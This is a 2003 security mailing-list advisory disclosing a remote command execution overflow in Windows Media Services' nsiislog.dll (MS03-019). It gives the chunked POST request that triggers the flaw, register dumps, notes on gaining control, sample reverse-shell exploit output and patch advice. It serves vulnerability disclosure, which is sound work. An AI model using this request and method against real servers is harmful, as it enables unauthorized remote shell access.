Windows Media Services Remote Command Execution

• Previous message: Russ: "Revised: Microsoft Security Bulletin - MS03-019"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date:         Sat, 31 May 2003 12:26:27 +1200
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

========================================================================
= Windows Media Services Remote Command Execution
=
= NSIISLOG.DLL Ver 4.1.0.3920
=
= MS Bulletin posted: May 28, 2003 revised May 30, 2003
= http ://www.microsoft.com/technet/security/bulletin/MS03-019.asp
=
= Affected Software:
= Microsoft Windows NT 4.0
= Microsoft Windows 2000
=
= Public disclosure on May 30, 2003
========================================================================

A long time ago, in a place far far away....

Well actually it was four months ago over here in New Zealand. Christmas
holidays had finished and I was half way through contemplating writing
a paper entitled 'The Methodical Approach To Finding Overflows'.

I thought I had better try out the concept behind this approach and the
issues discovered in nsiislog.dll are some of the results of it.

== MS03-019 states ==
Impact: Allow an attacker to execute code of their choice
Max Risk: Important

There is a flaw in the way in which nsiislog.dll processes incoming
requests. A vulnerability exists because an attacker could send specially
formed communications to the server that could cause IIS to stop responding
to Internet requests.

The vulnerability results because of an unchecked buffer used by the
nsiislog.dll file for logging. If a specially crafted request is sent to the
server, the logging file will attempt to write a larger buffer than is
possible,which then in turn causes the IIS service to fail.
== MS03-019 ==

== Description ==

Sending a chunked encoded post to nsiislog.dll will cause an access
violation
resulting in the following error log.

------------------------------------------------------------------------
Event Type: Warning
Event Source: W3SVC
Event Category: None
Event ID: 37
Description:
Out of process application '/LM/W3SVC/1/Root' terminated unexpectedly.
------------------------------------------------------------------------

A chunked encoded post will result in the control of EAX and ECX, with
the exception ocurring at a mov dword ptr [ecx],eax instruction.

This allows remote command execution with privileges associated with the
IWAM_machinename account.

== Chunked Transfer-Encoding Post ==

POST /scripts/nsiislog.dll HTTP/1.1
Transfer-Encoding: chunked

PostLength
PostData
0

Using Size: 121
Connecting....Sending Buffer....
78003F25 dec dword ptr [ecx+0ACh]
-
7800F5ED dec dword ptr [esi] ESI = 58585858

Using Size: 510
Connecting....Sending Buffer....
77FC8FE1 mov dword ptr [ecx],eax EAX = 58585858
                                                ECX = 58585858

Using Size: 5000
Connecting....Sending Buffer....
40F01DCC rep movs dword ptr [edi],dword ptr [esi]
-
77FC8FE1 mov dword ptr [ecx],eax EAX = 58585858
                                                ECX = 58585858

== Exploitation ==

The infamous 'mov dword ptr [ecx],eax' which allows an attacker to take
control by placing a value into a position that is later retrieved for the
EIP register.

In this case the exception was handled internally so execution flow could
not be obtained by taking advantage of SEH, but we were successful in
obtaining control by overwriting a portion of another 3 leter acronym.

== Exploit Example ==

%:\>exploit 192.168.1.63
** IISNSLOG.DLL - 4.1.0.3920 - Remote Shell **

. Calling Home: blackhole:2000
. Using: 0x########h as ABC overwrite
. Using: 0x########h as direct jump location
. Shellcode Size: 322 bytes
. Preparing Exploit Buffer......Ready
. Starting Listener On Port: 2000
. Connecting To Target
. Sending Exploit......Exploit Sent
. Connection Received
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>whoami
IWAM_BLACKHOLE
C:\WINNT\system32>

== Solutions ==

- Every day can be a 0-day day on the Internet. Limiting the avenues of
  attack can be a key factor in reducing the risk to a web server. Programs
  such as secureIIS and URLscan should be setup to reduce the number of
  methods that can be used to send data to a server. Removing unnecessary
  services, files and isapi extensions reduces the number of listeners
  that data can be fed to limiting the number of vulnerabilities that a
  server is susceptible to.
- Install the vendor supplied patch.

== Credit ==

Discovered and advised to Microsoft January 27, 2003 by Brett Moore.

%-) shutz to: eEye, spyrit and all kiwis with hackfu
%-) ha. we'll just say: "All of your livers are belong to us".

oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Delivery co-sponsored by TruSecure
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
FREE 14-DAY TRIAL of New Threat & Vulnerability Notification Service

TruSecure's new IntelliShield(tm) web-based threat and vulnerability
service isn't your typical alert service. Supported by TruSecure's vast
intelligence resources - including the ICSA Labs - IntelliShield's early
warning, analysis, decision support, and threat management tools provide
organizations with unmatched intelligence to better protect critical
information assets. Experience it for yourself - just click below to begin
your FREE, NO OBLIGATION 14-day trial today!

http://www.trusecure.com/offer/s0074/

oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo

• Previous message: Russ: "Revised: Microsoft Security Bulletin - MS03-019"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]